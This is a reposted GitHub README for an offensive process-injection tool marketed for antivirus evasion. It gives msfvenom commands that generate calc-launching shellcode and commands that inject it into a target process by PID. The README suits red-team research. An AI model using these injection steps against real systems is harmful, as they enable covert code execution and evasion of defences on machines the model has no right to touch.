3xpl01tc0d3r/ProcessInjection: The program is designed to inject shellcode in a target process. 进程注入payload实现免杀
2019-09-02 01:00:39 Author: github.com(查看原文) 阅读量:493 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

The program is designed to inject shellcode in a target process.

C#


The program is designed to inject shellcode in a target process.

Currently the program accepts shellcode in 3 formats

1) base64
2) hex
3) C

Command Line Usage

Generating shellcode in base64 format and injecting it in the target process.
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" | base64
ProcessInjection.exe /pid:123 /path:""C:\Users\User\Desktop\shellcode.txt"" /f:base64

Generating shellcode in hex format and injecting it in the target process.
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" -f hex
ProcessInjection.exe /pid:123 /path:""C:\Users\User\Desktop\shellcode.txt"" /f:hex

Generating shellcode in c format and injecting it in the target process.
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" -f c
ProcessInjection.exe /pid:123 /path:""C:\Users\User\Desktop\shellcode.txt"" /f:c

Blog Post

https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html


文章来源: https://github.com/3xpl01tc0d3r/ProcessInjection
如有侵权请联系:admin#unsafe.sh